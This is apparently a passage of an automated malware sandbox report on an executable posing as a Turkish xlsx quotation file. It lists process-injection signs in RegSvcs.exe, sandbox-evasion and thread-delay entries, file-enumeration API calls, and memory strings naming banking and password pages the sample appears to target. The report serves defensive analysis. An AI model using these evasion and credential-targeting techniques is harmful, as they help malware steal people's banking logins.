                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99164
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI/Special instruction interceptor: Address: 18A19DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599436Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598988Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8221Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1621Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI coverage: 3.8 %
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001EDBBE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001BC2A2 FindFirstFileExW,0_2_001BC2A2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F68EE FindFirstFileW,FindClose,0_2_001F68EE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001F698F
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001ED076
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001ED3A9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001F9642
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001F979D
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001F9B2B
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001F5C97
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001842DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599436Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598988Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594838Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594266Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
